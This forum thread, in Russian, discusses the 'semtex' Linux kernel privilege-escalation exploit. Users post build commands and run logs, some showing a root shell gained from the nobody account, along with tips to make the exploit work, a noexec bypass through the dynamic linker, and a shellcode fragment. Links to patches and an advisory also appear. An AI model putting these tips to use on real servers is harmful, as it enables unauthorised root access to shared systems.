> Debian 7.0, ядро ubuntuamd64 надо :)
$ gcc -o semtex semtex.c
$ chmod +x semtex
$ ./semtex
2.6.37-3.x x86_64
sd@fucksheep.org 2010
semtex: semtex.c:81: main: Assertion `p = memmem(code, 1024, &needle, 8)' failed.
Aborted
$ uname -srv
Linux 3.5.3-gentoo #1 SMP PREEMPT Wed Sep 5 12:45:12 MSK 2012
$ gcc semtex.c -o semtex-1
$ ./semtex-1
2.6.37-3.x x86_64
sd@fucksheep.org 2010
semtex-1: semtex.c:81: main: Assertion `p = memmem(code, 1024, &needle, 8)' failed.
Аварийный останов
$$ gcc -O2 semtex.c -o semtex
$ ./semtex
2.6.37-3.x x86_64
sd@fucksheep.org 2010
#Оптимизируйте!
З.Ы. Debian testing
$ gcc -o semtex semtex.c
$ chmod +x semtex
$ ./semtex
Killed
$ uname -srv
Linux 3.8.0-16-generic #26-Ubuntu SMP Mon Apr 1 19:52:57 UTC 2013
$ gcc -o semtex semtex.c
$ chmod +x semtex
$ ./semtex
Killed
$ uname -srv
Linux 3.0.0-12-server #20-Ubuntu SMP Fri Oct 7 16:36:30 UTC 2011
$ gcc -o semtex semtex.c
$ chmod +x semtex
$ ./semtex
Killed
$ uname -srv
Linux 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012
А чего компиляция эксплойта выполняется от root? Это обязательно?
Данная новость дает ответ полный ответ на новость: Выявлена атака по внедрению бэкдора на web-серверы с lighttpd и nginx. Если учесть что некоторые обслуживают сервера по принципу работает, а значит обновить не надо, то вывод в таком случае логичен. Это я к тому, что даже когда выйдет фикс проблему, это ее полностью не устранит, но это станет личной проблемой тех, кто пренебрегает обновлением системы.P.S. Мне вот что интересно, если баг существует 2 или 3 года, то почему его ни кто не заметил. Ведь над ядром работают сотни программистов, и при этом у каждого своя рабочая область. Торвальдс когда то говорил, когда за кодом следят, множество глаз то код становится более безопасным.
У тебя работает? Как запустил?
Более безопасный != абсолютно безопасный
> P.S. Мне вот что интересно, если баг существует 2 или 3 года,
> то почему его ни кто не заметил. Ведь над ядром работают
> сотни программистов, и при этом у каждого своя рабочая область. Торвальдс
> когда то говорил, когда за кодом следят, множество глаз то код
> становится более безопасным.это уже 2й громкая дыра с начала года, и третий экслойт который накрывает версии ядер десятками.
интересно сколько таких дыр в ядре еще?
> это уже 2й громкая дыра с начала года, и третий экслойт который
> накрывает версии ядер десятками.
> интересно сколько таких дыр в ядре еще?Много. Наверняка. Радует то, что их достаточно оперативно отстреливают.
> Много. Наверняка. Радует то, что их достаточно оперативно отстреливают.Теперь ясно, какое время подразумевается под словом оперативно, 2 или 3 гола
> Теперь ясно, какое время подразумевается под словом оперативно, 2 или 3 голаОперативно - это по мере обнаружения.
В виндах все проще - их просто не обнаруживают, и даже если обнаруживают - объявляют фичей. Я до сих пор помню ответ поддержки мс на попытку прислать им прототип DoS в подсистеме RPC. Шаблонка вида "оценено, передано разработчикам, blah-blah, ждите исправления, мы работаем для Вас". И тишина. А через 8 месяцев появляется Blast на базе именно этой дыры. Иногда жалею, что не стал сам ковырять дальше, и не завёл себе маленький ботнет :)
> это уже 2й громкая дыра с начала года, и третий экслойт который
> накрывает версии ядер десятками.
> интересно сколько таких дыр в ядре еще?Вообще дальше ошибок будет больше, это связано с быстрым ростом ядра, да и вообще это касается любого крупного проекта, в который постоянно добавляется новый код. Что же касается ядра то от релиза к релизу в него добавляют очень много кода, новые функции драйвера, и некоторые исправления. Вносить изменения в такой большой объем кода сложно, по той причине, что функции одной системы могут опираться на функции другой. И тогда получается что внося изменения в свою систему, маинтейнер должен внести изменения в соседскую подсистему, и если он не является маинтейнером этой подсистемы это тоже вызывает трудности но только у маинтейнера этой подсистемы. Представьте, что вы хорошо знаете свою систему, свой код и вы легко можете по нему перемещаться. И тут одним ранним утром в вашем коде появляются изменения, которые вносили не вы. Хорошо вы учли это, так сказать дополнили свою карту кода, но завтра происходит еще одно изменение, и вам опять надо приспосабливаться. Это конечно легко когда объемы кода небольшие, но ведь проект постоянно растет. Конечно, есть системы, облегчающие групповую разработку, но она не может исключить человеческий фактор.
Некоторые тут говорят, что эксплоит не работает, такое возможно на разных дистрибутивах и версиях. Причина проста некоторые дистрибутивы, накладывают свои собственные патчи и при этом не все эти патчи попадают в основную ветку ядра.
А вообще новость интересная особенно на воне вчерашней новости. Вчера говорили Windows
медленно Linux, а уже сегодня говорят, что в Linux есть опасная уязвимость, которой не один год.
> а уже сегодня говорят, что в Linux есть опасная уязвимость, которой не один год.А от некрософта подобную информацию ещё поди получи, если сторонний добрый дядя её в full-disclosure@ не закинет.
От этого, понятно, легче не становится.
>> а уже сегодня говорят, что в Linux есть опасная уязвимость, которой не один год.
> А от некрософта подобную информацию ещё поди получи, если сторонний добрый дядя
> её в full-disclosure@ не закинет.
> От этого, понятно, легче не становится.Майки, твои аргументы в стиле "а у вас негров линчуют!" не канают. Как ты - якобы взрослый - понимаешь, проблемы некрософта вас тут ипать вообще не должны. У вас вон свои какие. Компрене ву?
> это уже 2й громкая дыра с начала года,Локальный подъем прав - это, конечно, нехорошо. Но громкость дырки как-то явно преувеличена. А так - ну идите и пользуйте миникс какой-нибудь. В нем точно дырок не найдут. Даже не потому что их нет, а потому что неуловимый Джо.
>> это уже 2й громкая дыра с начала года,
> Локальный подъем прав - это, конечно, нехорошо. Но громкость дырки как-то явно
> преувеличена. А так - ну идите и пользуйте миникс какой-нибудь. В
> нем точно дырок не найдут. Даже не потому что их нет,
> а потому что неуловимый Джо.то есть хотите сказать что в линуксе дыр не искали по той же причине - а как станет такой же популярный как windows их там быстро найдут ?:)
> то есть хотите сказать что в линуксе дыр не искали по той
> же причине - а как станет такой же популярный как windows
> их там быстро найдут ?:)И как - много виндовсов в открытых системах, поддерживающих тысячи и миллионы пользователей?
>> то есть хотите сказать что в линуксе дыр не искали по той
>> же причине - а как станет такой же популярный как windows
>> их там быстро найдут ?:)
> И как - много виндовсов в открытых системах, поддерживающих тысячи и миллионы
> пользователей?насколько помню оно даже в top100 есть.
>> И как - много виндовсов в открытых системах, поддерживающих тысячи и миллионы
>> пользователей?
> насколько помню оно даже в top100 есть.Насколько помню, оно на той установке сливает линуксу и потому не используется.
используется. А сливает или нет.. хз. не интересовался вопросом - меня больше верхняя часть списка волнует.
Хотя возможно и эти сгодятся.
> насколько помню оно даже в top100 есть.И много там его?
Top100 != Mass1E100500
>> насколько помню оно даже в top100 есть.
> И много там его?
> Top100 != Mass1E100500Сколько бы не было. Но есть ;-) теперь изобретайте аргументы что бы показать что его там быть не может..
> Сколько бы не было. Но есть ;-) теперь изобретайте аргументы что бы
> показать что его там быть не может..Зачем? % соотношение и так далеко не в пользу "популярности".
> же причине - а как станет такой же популярный как windows их там быстро найдут ?:)А в windows почему-то раз в месяц, во вторник, прилетает целый стопарь патчей. Ежемесячно. Вон тут кто-то отписался что там нынче 30+ дыр законопачено. И кстати линукс уже давно стал куда популярнее винды во многих областях, если уж на то пошло. Пора бы отпустить ручник и просто посмотреть вокруг.
> это уже 2й казахский вирус с начала годаfftgj
Не работает. Что надо пропатчить, что бы заработало?
Блин и так все експлоеты, нифига не работает! Когда выпустят хорошие наборы експлоетов для линукс!?
Давно уже выпускают. Были б деньги...
как БАДы? "Средство макропукиса" на универсальный (абстрактный) генокод? )))
l@localhost:~$ sudo gcc -O2 /home/l/exploit.c
l@localhost:~$ sudo chmod 777 a.out
l@localhost:~$ su nobody -s /bin/bash
nobody@localhost:/home/l$ /home/l/a.out
Killed
nobody@localhost:/home/l$ id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
nobody@localhost:/home/l$Не работает или что не так? Ubuntu 12.04, 3.2.0-41-generic
./a.out
a.out: semtex.c:51: sheep: Assertion `!close(fd)' failed.
Аварийный останов (сделан дамп памяти)
свежий Debian 7 stable :)
sashko@Gladiator:~/Documents$ uname -a
Linux Gladiator 3.2.0-4-amd64 #1 SMP Debian 3.2.41-2 x86_64 GNU/Linux
sashko@Gladiator:~/Documents$ ./a.out
2.6.37-3.x x86_64
sd@fucksheep.org 2010
root@Gladiator:~/Documents#
В 3.9.2 её нету?
Вот всегда так с linux-ом - сам эксплоит скачай, сам скомпилируй, сам разберись, почему не работает...$ ./semtex
semtex: semtex.c:51: sheep: Assertion `!close(fd)' failed.
Аварийный останов$ uname -srv
Linux 3.0.75-std-pae-alt0.M60P.1 #1 SMP Fri Apr 26 10:28:46 UTC 2013
Админы локалхостов могут не напрягаться. Новость она для тех, кто админит сервера, на которые в силу специфики есть пользовательский доступ потенциальным злоумышленикам. Вот в таком случае админу не надо ничего качать и компилировать, все сделают за него :)
Ubuntu 12.04.2.
Был остановлен ужасной ошибкой:gcc: error: unrecognized option '-02'
Не стать мне хакером. Такие дела. Считать это победой Ubuntu над этим багом?
ты вместо нуля(0) напиши букву О
Я не хочу ничего решать, я просто хочу root!
> Я не хочу ничего решать, я просто хочу root!Купи себе наконец свой комп и будь им! )))
> Я не хочу ничего решать, я просто хочу root!В Ubuntu пользователя root нет. Привилегии через sudo повышаются для обычного пользователя.
Ваш К.О.
> В Ubuntu пользователя root нет. Привилегии через sudo повышаются для обычного пользователя.Чавойт?
$ sudo passwd root
...
$ su -
...
# whoami
root
>> В Ubuntu пользователя root нет. Привилегии через sudo повышаются для обычного пользователя.
> Чавойт?
> $ sudo passwd root
> ...
> $ su -
> ...
> # whoami
> rootНу и на кой ляд ты в убунте пользователя рут себе создал? Не, серьёзно, зачем он тебе там?
> В Ubuntu пользователя root нет.Вас и тут обманули...
> Привилегии через sudo повышаются для обычного пользователя.
Что в качестве дефолта вообще-то крайне глупо, см. пояснения solardiz.
> gcc: error: unrecognized option '-02'
> Считать это победой Ubuntu над этим багом?Да, Ubuntu для таких и создавали! :)
Debian 6 не работает
sashko@Gladiator1:~/Documents$ uname -a
Linux Gladiator1 2.6.32-5-amd64 #1 SMP Mon Feb 25 00:26:11 UTC 2013 x86_64 GNU/Linux
sashko@Gladiator1:~/Documents$ ./a.out
a.out: exploit.c:51: sheep: Assertion `!close(fd)' failed.
Aborted
sashko@Gladiator1:~/Documents$
$ gcc -O2 test.c
test.c: В функции «fuck»:
test.c:30:37: предупреждение: приведение указателя к целому другого размера [-Wpointer-to-int-cast]
test.c:30:23: предупреждение: приведение к типу указателя от целого другого размера [-Wint-to-pointer-cast]
test.c:31:21: предупреждение: приведение указателя к целому другого размера [-Wpointer-to-int-cast]
test.c:37:19: предупреждение: приведение к типу указателя от целого другого размера [-Wint-to-pointer-cast]
test.c: В функции «main»:
test.c:74:3: предупреждение: приведение к типу указателя от целого другого размера [-Wint-to-pointer-cast]
test.c:74:3: предупреждение: приведение к типу указателя от целого другого размера [-Wint-to-pointer-cast]
$ ./a.out
a.out: test.c:51: sheep: Assertion `!close(fd)' failed.
Аварийный останов (сделан дамп памяти)
$ uname -a
Linux matveev 3.2.0-41-generic-pae #66-Ubuntu SMP Thu Apr 25 03:50:20 UTC 2013 i686 i686 i386 GNU/Linux
exploit $ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 12.04.2 LTS
Release: 12.04
Codename: precise
$
В Linux есть негласная парадигма: "если ты злой буратино - ты сам себе злой буратино!"
Некоторые мутируют в "хитрых буратино, ищущих просто буратино" Се ля ви (пардон что не по-французски)...
Еще интересней дальшей развитие абстракции:
Есть первородный червь сомнения, что идеальный код заползет таки "нечистый"...
И чтобы отвлечь и подкормить этого "черьвя публики" подбросить таки "львам пиршество"... )))
gcc -O2 semtex.c тоже не очень помог. Получаю вот такой ужасный лог:
http://paste.omsklug.com/1122/
Почему криворукие программисты такие? Никак не сделают нормальный эксплойт.
> gcc -O2 semtex.c тоже не очень помог. Получаю вот такой ужасный лог:
> http://paste.omsklug.com/1122/
> Почему криворукие программисты такие? Никак не сделают нормальный эксплойт.ты html'ку слил...
теперь слил код, сцомпилировать попытался и получил:
http://paste.omsklug.com/1123/В общем, новость фейк. Очередные, якобы, уязвимости, найденные, якобы, специалистами по безопасности.
P.S. Linux world 3.5.0-27-generic #46~precise1-Ubuntu SMP Tue Mar 26 19:33:56 UTC 2013 i686 i686 i386 GNU/Linux
> теперь слил код, сцомпилировать попытался и получил:Ну варнинги. Ну да, эксплойт писал не Дональд Кнут и даже не K&R. Ну, бывает. Тем не менее, указанные варнинги не фатальны для сборки. Топорно? Да, топорно. Но эксплойт - штука демонстрационная.
Просто ты его неосилил убунтовод. У нас хардкорных редхатодебианщиков и прочих все отлично работает ))
Впервые вижу реально рабочий и настолько простой в установке эксплоит.
> Просто ты его неосилил убунтовод. У нас хардкорных редхатодебианщиков и прочих все
> отлично работает ))
> Впервые вижу реально рабочий и настолько простой в установке эксплоит.У меня на Mint13 тоже не взлетело. Что то накосячили в экплоите.
А у меня просто gcc нету на продуктивных серверах
И что? Это как то помешает злоумышленикам собрать эксплойт на своей машине, а уже потом запустить бинарь на сервере?
"noexec" помешает.
Не помешает. Бинарники можно запускать через динамический линковщик без прав для запуска, как скрипты (как-то так: /ld-linux-x86-64.so.2 /path/to/binarya). По сути своей опция noexec бессмыслена, она только защитит от suid/sgid флагов (фактически будет запущен процесс динамического линковщика), но это более логично делается nosuid/nosgid опциями.
А ему нужен o+x вообще?(Вопрос без подковырки).
Что им запускается на боевой системе?
ldd - это враппер для него. Теоретически, наверное, можно динамический линковщик сделать незапускаемым (не знаю, чтобы что-нибудь вызывало его напрямую кроме ldd), но вообще вера в то, что тот, кто имеет доступ к системе на уровне хотя бы простенького интерпритатора не сможет запустить произвольный бинарный код - создаёт опасную иллюзию безопасности.
При чём тут ldd? Ты с ld.so не спутал?
chmod 777 a.out
Это лишнее.
В дебиане 7 со всеми обновлениями прекрасно работает. Что не может не радовать.
Обновление наверняка придет через пару минут. Я в это верю.
Лучше через sysctl закрыть, а не ждать обновления ;)
Мне вот например так и не ясно что нужно чтобы эксплойт работал.
Ядро 3.5.0-17-generic эксплойт рута не получает (правда компилится с предупреждением на преобразование типа).
Я смотрю, у многих мозга не хватает запускать код от nobody.
Так все под root - для лучшей безопасности.
Я от nobody запустил, вот и хочу узнать что же не так?
l@localhost:~$ sudo gcc -O2 /home/l/exploit.c
l@localhost:~$ sudo chmod 777 a.out
l@localhost:~$ su nobody -s /bin/bash
nobody@localhost:/home/l$ /home/l/a.out
Killed
nobody@localhost:/home/l$ id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
nobody@localhost:/home/l$
Запусти от обычного пользователя. Может в убунтах нобади имеет ограниченные права. Там же какие-то доп защиты активированы...
Нет, тоже самое:
l@localhost:~$ ./a.out
Killed
l@localhost:~$ id
uid=1000(l) gid=1000(l) groups=1000(l),4(adm),20(dialout),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin)
Ниже сказали это потому что в Ubuntu нет пользователя root (по дефолту).
> Ниже сказали это потому что в Ubuntu нет пользователя root (по дефолту).Глупость ляпнули (видимо, повторили). :(
Он там есть, просто у него пароля нет и по этому по дефолту под ним нельзя залогиниться. Вот некоторые чукчи и думают что его нет :)
> Он там есть, просто у него пароля нетСтрого говоря -- "не существует подходящего пароля", а то опять двусмысленно.
если этот иксплоит запустить от рута, можно получить права супер-рута!
> Я смотрю, у многих мозга не хватает запускать код от nobody.[nobody@linuraid tmp]$ ./a.out
a.out: ./a.c:51: sheep: Assertion `!close(fd)' failed.
Аварийный останов (core dumped)
[nobody@linuraid tmp]$
А ни хрена. На редхате не работает.$ ./a.out
2.6.37-3.x x86_64
sd@fucksheep.org 2010
a.out: a.c:81: main: Assertion `p = memmem(code, 1024, &needle, 8)' failed.
Аварийный останов
$ uname -a
Linux dev.local 2.6.32-358.6.1.el6.x86_64 #1 SMP Tue Apr 23 19:29:00 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
$ exit
# reboot
>[оверквотинг удален]
> $ ./a.out
> 2.6.37-3.x x86_64
> sd@fucksheep.org 2010
> a.out: a.c:81: main: Assertion `p = memmem(code, 1024, &needle, 8)' failed.
> Аварийный останов
> $ uname -a
> Linux dev.local 2.6.32-358.6.1.el6.x86_64 #1 SMP Tue Apr 23 19:29:00 UTC 2013 x86_64
> x86_64 x86_64 GNU/Linux
> $ exit
> # rebootПересоберите с -O2
gcc -O2 semtex.cСработает.
> Пересоберите с -O2
> gcc -O2 semtex.c
> Сработает.Не помогло
положительно[root@localhost expl]# uname -a
Linux localhost.localdomain 2.6.39-400.23.1.el6uek.x86_64 #1 SMP Wed May 8 16:37:12 PDT 2013 x86_64 x86_64 x86_64 GNU/Linux
[root@localhost expl]# gcc -O2 semtex.c
[root@localhost expl]# chmod 777 a.out
[root@localhost expl]# su nobody -s /bin/bash
bash-4.1$ id
uid=99(nobody) gid=99(nobody) groups=99(nobody) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
bash-4.1$ cd /tmp/expl/
bash-4.1$ ls
a.out semtex.c
bash-4.1$ ./a.out
2.6.37-3.x x86_64
sd@fucksheep.org 2010
-sh-4.1# id
uid=0(root) gid=0(root) groups=0(root),99(nobody) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
-sh-4.1# service radiusd restart
Stopping radiusd: [ OK ]
Starting radiusd: [ OK ]
-sh-4.1#
> положительно
> Linux localhost.localdomain 2.6.39-400.23.1.el6uek.x86_64Ну це, ССЗБ :) На ванильном el6 ядре не катает.
Блин, кто знает как в убунте запустить?
$ ./a.out
Убито
$ uname -a
Linux ... 3.8.0-19-generic #30-Ubuntu SMP Wed May 1 16:35:23 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
> Блин, кто знает как в убунте запустить?
> $ ./a.out
> Убито
> $ uname -a
> Linux ... 3.8.0-19-generic #30-Ubuntu SMP Wed May 1 16:35:23 UTC 2013 x86_64
> x86_64 x86_64 GNU/LinuxНикак у меня на Mint13 тоже не заработало. Скорей всего эта уязвимость только в RH клонах
Linux 2.6.32-042stab063.2 x86_64
CentOS release 6.3 (Final)эксплоит сработал :(
Проверил еще на одном тестовом хосте с самопальным ядром на базе центосовского:# su nobody -s /bin/bash
$ ./a.out
2.6.37-3.x x86_64
sd@fucksheep.org 2010
a.out: a.c:81: main: Assertion `p = memmem(code, 1024, &needle, 8)' failed.
Аварийный останов
$ uname -a
Linux angtest.local 2.6.32-358.2.1.el6.atlac.52.x86_64 #1 SMP Sun Apr 14 17:13:16 MSK 2013 x86_64 x86_64 x86_64 GNU/Linux
$ exit
# reboot
[g@localhost ~]$ uname -r
2.6.32-358.6.1.el6.x86_64
[g@localhost ~]$ gcc -O2 -o ss semtex.c
[g@localhost ~]$ ./ss
2.6.37-3.x x86_64
sd@fucksheep.org 2010
-sh-4.1# ls /root
anaconda-ks.cfg post-install post-install.log rpmbuild
-sh-4.1# rm -f /root/post-install.log
-sh-4.1# ls /root
anaconda-ks.cfg post-install rpmbuild
-sh-4.1#
Вот так.
[root@test.loc]# su nobody -s /bin/bash
[nobody@test.loc home]$ ./a.out
2.6.37-3.x x86_64
sd@fucksheep.org 2010
[root@test.loc home]# id
uid=0(root) gid=0(root) группы=0(root),99(nobody)[root@test.loc home]# cat /etc/issue.net
CentOS release 6.4 (Final)
Kernel \r on an \m
[root@test.loc home]# uname -a
Linux test.loc 2.6.32-358.6.1.el6.x86_64 #1 SMP Tue Apr 23 19:29:00 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
ps. ядро последнее из оф. репозитория centosps2. жопа.
> ps. ядро последнее из оф. репозитория centos
> ps2. жопа.Хм. Интересно, чем мы таким отличаемся... Сколько памяти на хосте?
>> ps. ядро последнее из оф. репозитория centos
>> ps2. жопа.
> Хм. Интересно, чем мы таким отличаемся... Сколько памяти на хосте?4 gb (виртуалка), уязвимость работает и на железке с такой же конфигурацией
> 4 gb (виртуалка), уязвимость работает и на железке с такой же конфигурациейВот. Надо будет проверить - у меня обе виртуалки по 2 Гб. Вполне возможно, что эксплоиту для работы надо минимум 4Г задействованного адресного пространства...
[ ~]> gcc -O2 semtex.c && ./a.out
semtex.c:18:21: error: syscall.h: No such file or directory
[ ~]> uname -sr
FreeBSD 10.0-CURRENT
> [ ~]> gcc -O2 semtex.c && ./a.out
> semtex.c:18:21: error: syscall.h: No such file or directory
> [ ~]> uname -sr
> FreeBSD 10.0-CURRENTЧукча не читатель?
> Чукча не читатель?Он бсдшник )
изя, перелогинься
> [ ~]> uname -sr
> FreeBSD 10.0-CURRENTА чё, БЗДюки уже доросли до CGROUPS и PERF_EVENTS ?
> А чё, БЗДюки уже доросли до CGROUPS и PERF_EVENTS ?Ну вот, только они мечтать начали, как пришел павлин и всю малину обоср@л :). А так то да - нет фичи, нет проблем :)
вот вам и практика замалчивания информации о уязвимостях :-)
Если хваленые кернел хакеры не могут поймать информацию об этом в changelog ядра, то что говорить о обычных пользователях? которым так же рекомендуется читать changelog.
> вот вам и практика замалчивания информации о уязвимостях :-)
> Если хваленые кернел хакеры не могут поймать информацию об этом в changelog
> ядра, то что говорить о обычных пользователях? которым так же рекомендуется
> читать changelog.Уважаемый, если сможете запустить этот эксплоит, получите конфету :)
>> вот вам и практика замалчивания информации о уязвимостях :-)
>> Если хваленые кернел хакеры не могут поймать информацию об этом в changelog
>> ядра, то что говорить о обычных пользователях? которым так же рекомендуется
>> читать changelog.
> Уважаемый, если сможете запустить этот эксплоит, получите конфету :)оно отлично работает на том что есть под рукой. Новость больше создана что бы поделиться с массами - а то в очередной раз все тихо исправят (как в windows) и потом все будут уверены что глобальных дырок в linux не бывает...
PS. напомните мне сколько времени прошло между 2.6.37 и 3.8.8 ? Cколько дыра была не закрытой.
pss. это больше для админов у которых есть шел доступ всяких юзеров - хотя залить такой эксплойт можно и через веб.
> оно отлично работает на том что есть под рукой.Попробую спросить и у вас, я действительно хочу запустить. Ubunto 12.04 х64, 3.2.0-41-generic (это тоже у большинства под рукой):
l@localhost:~$ sudo gcc -O2 /home/l/exploit.c
l@localhost:~$ sudo chmod 777 a.out
l@localhost:~$ su nobody -s /bin/bash
nobody@localhost:/home/l$ /home/l/a.out
Killed
nobody@localhost:/home/l$ id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
nobody@localhost:/home/l$
Где я сделал ошибку?
>> оно отлично работает на том что есть под рукой.
> Попробую спросить и у вас, я действительно хочу запустить. Ubunto 12.04 х64,
> 3.2.0-41-generic (это тоже у большинства под рукой):за большинство отвечаем?:) у меня вот RHEL6 под рукой.
> Новость больше создана что бы поделиться с массамиЗа это спасибо, а информацию Максиму кратенько передал ещё днём.
>> Новость больше создана что бы поделиться с массами
> За это спасибо, а информацию Максиму кратенько передал ещё днём.ну что - будем рисовать еще одну новость о 0 day?
свежий рут эксплойт - всего 2 дня ему..
http://www.exploit-db.com/exploits/25307/
Эксплтойт новый, дыра старый! CLONE_NEWUSER уже починили.https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux....
> ну что - будем рисовать еще одну новость о 0 day?А что, рисуй. Хоть какая-то польза от тебя будет.
На Ubuntu 12.04.2 не работает... Так что уже не все.
А что на 64-битных платформах int не перекрывает u64 в gcc?
> А что на 64-битных платформах int не перекрывает u64 в gcc?не на каких не перекрывает. u64 == long на 64bit, и == long long на 32бит.
int никогда выше 32 бит не был.
Тупой программер просто скопировал исходник из 32-битной платформы в 64-битную?
> А что на 64-битных платформах int не перекрывает u64 в gcc?самое смешное что (в 3.2) на 6 строк выше в sw_perf_event_destroy event_id объявлен правильным типом,
патч тривиальный, можно самому вылечить если не хочется ждать
CentOS6 OpenVZ$ uname -a
Linux x 2.6.32-042stab065.3 #1 SMP Mon Nov 12 21:59:14 MSK 2012 x86_64 Intel(R) Xeon(R) CPU E5506 @ 2.13GHz GenuineIntel GNU/Linux$ ./a.out
2.6.37-3.x x86_64
sd@fucksheep.org 2010
a.out: ./semtex.c:81: main: Assertion `p = memmem(code, 1024, &needle, 8)' failed.
Aborted
Поправка, скомпилив с -O2 сработало. МЫ ВСЕ УМРЕМ!
Debian Squeeze with Backports$ ./a.out
a.out: semtex.c:51: sheep: Assertion `!close(fd)' failed.
Aborted
Мандрива 2010 с самопальным ядром, 3.2.12LN #2 SMP PREEMPT Mon Feb 18 10:50:11 FET 2013 i686 Intel(R) Celeron(R) CPU 2.53GHz GNU/Linux
Запуск эксплойта
./a.out
a.out: exploit.c:51: sheep: Assertion `!close(fd)' failed.
Аварийный останов
Вход в анонимуса - с паролем, если там какойто дистр дырявый, то это не касается всех...
Ниасилил :(
После вот этого
su nobody -s /bin/bashспросило пароль
sudo su nobody -s /bin/bash
Linux host0 2.6.32-358.6.1.el6.x86_64 #1 SMP Tue Apr 23 19:29:00 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
РаботаетLinux ubuntu 3.5.0-23-generic #35~precise1-Ubuntu SMP Fri Jan 25 17:15:33 UTC 2013 i686 i686 i386 GNU/Linux
Не работает
БЕЗ "-O2" НЕ РАБОТАЕТ. в экспойте где-то баг. ну или защита от дурака.
Странные вы, линуксоиды: на своих тачках САМИ бяку запускаете. Все код смотрели перед компиляцией? А может там еще какая-то бяка есть, которая вам ФС запортит.
> Странные вы, линуксоиды: на своих тачках САМИ бяку запускаете. Все код смотрели
> перед компиляцией? А может там еще какая-то бяка есть, которая вам
> ФС запортит.Успокойся, смотрели http://www.opennet.me/openforum/vsluhforumID3/90017.html#108
Что, реально думаете, кто-то на своем железе, а не на стенде или виртуалке запускает???
Строку на перле напомнить ?
Ну я на реальном рабочем десктопе запустил. Всё равно в понедельник на нём будет запущен DataDestroyer, aka dd и винт будет частичной копией /dev/urandom.
> Странные вы, линуксоиды: на своих тачках САМИ бяку запускаете.Конечно на своих. Запустил KVMную виртуалку и в ней и запустил. А ты что подумал, чудак? :)
на 6 дебиане с 2.6.32 ни на одном не отработал.
на 7 все ок:nobody@deb7testdeb:/tmp$ cat /etc/issue
Debian GNU/Linux 7.0 \n \lnobody@deb7testdeb:/tmp$ uname -a
Linux deb7testdeb 2.6.32-042stab074.10 #1 SMP Fri Mar 1 09:18:44 MSK 2013 x86_64 GNU/Linux
nobody@deb7testdeb:/tmp$ whoami
nobody
nobody@deb7testdeb:/tmp$ ./a.out
2.6.37-3.x x86_64
sd@fucksheep.org 2010
root@deb7testdeb:/tmp# whoami
root
Что же вы так нехорошо поступаете? Тут люди думали, что раз дебиан год заморожен был, и перед релизом счетчик багов упал до нуля, то багов нем больше и нет. От предложения посмотреть счетчик багов после релиза они гордо отказались.
Пакеты последнего stable ядра centos 6 x64 с патчем
http://repo.scopenco.net/centos/6/x86_64/Проверено не ломается.
> Проверено не ломается.Ломается, эксплойт от скрипт-киддисов защищен. :)
Если обновить то не ломается.
Получается такое:
$ ./a.out
a.out: semtex.c:51: sheep: Assertion `!close(fd)' failed.
Aborted
Там два байта переставить надо
Опять обманули...
И почему у меня i686
Ну линукс... Ну красавец! Вот вам и безопасная ОС! Вы еще не стали частью ботнета?! Мы идем к вам! :)
Пустослов!
Сначала винду обнови: http://habrahabr.ru/company/eset/blog/179315/
В OpenVZ сегодня починили: https://openvz.org/Download/kernel/rhel6/042stab076.8
мой компuname -a
Linux 2.6.32-358.6.1.el6.i686 #1 SMP Tue Apr 23 18:13:20 UTC 2013 i686 i686 i386 GNU/Linux
----------------------------------------------------------------------------------------------
попытка скомпилироватьgcc -O2 exp.c
exp.c: В функции ‘fuck’:
exp.c:30: предупреждение: приведение указателя к целому другого размера
exp.c:30: предупреждение: приведение к типу указателя от целого другого размера
exp.c:31: предупреждение: приведение указателя к целому другого размера
exp.c:37: предупреждение: приведение к типу указателя от целого другого размера
exp.c: В функции ‘sheep’:
exp.c:49: предупреждение: целая константа слишком велика для типа ‘long’
exp.c: В функции ‘main’:
exp.c:63: предупреждение: целая константа слишком велика для типа ‘long’
exp.c:63: предупреждение: целая константа слишком велика для типа ‘long’
exp.c:74: предупреждение: приведение к типу указателя от целого другого размера
exp.c:74: предупреждение: приведение к типу указателя от целого другого размера----------------------------------------------------------------------------------------------
тем не менее a.out появился... запускаем./a.out
a.out: exp.c:51: sheep: Assertion `!close(fd)' failed.
Аварийный останов (core dumped)
root-а не получил :(
su nobody -s /bin/bash
Пароль:
su: Сбой при проверке подлинностиа пароль то какой у nobody? ))
$ ./a.out
a.out: semtex.c:51: sheep: Assertion `!close(fd)' failed.
Аварийный останов (core dumped)Не работает.
3.8.11-200.fc18.x86_64Так и должно быть
Я перед тем, как собрать этот странный эксплоит почитал код, хоть я и не силён в сях но всё же тут что-то странное, кто ни будь объясните эти строки:memcpy(code-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf",
printf("2.6.37-3.x x86_64\nsd@fucksheep.org 2010\n") % 27);что за sd@fucksheep.org ? Он что-то отправляет на почтовый ящик?
Хоть и выглядит как printf, с выводом текста, но что-то сыкотно, не буду я на рабочей системе тестить =) Поставлю-ка в виртуалке...
> Я перед тем, как собрать этот странный эксплоит почитал код, хоть я
> и не силён в сях но всё же тут что-то странное,
> кто ни будь объясните эти строки:
> memcpy(code-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf",
> printf("2.6.37-3.x x86_64\nsd@fucksheep.org 2010\n") % 27);
> что за sd@fucksheep.org ? Он что-то отправляет на почтовый ящик?
> Хоть и выглядит как printf, с выводом текста, но что-то сыкотно, не
> буду я на рабочей системе тестить =) Поставлю-ка в виртуалке...линуксоиды такие линуксоиды
тролль такой тролль
перевод Hex в бинарный вид
И в новости конечно ни слова о том, что эксплойт только под x86_64...
Жаль, значит для root'инга Android'ов бесполезен.
У вас куркулятор )? 64 бит - это все современные камни, включая большинство лохматых атомов
> У вас куркулятор )?\Да, нынче как раз на калькуляторах линукс запускают :)
http://www.debian.org/security/2013/dsa-2668
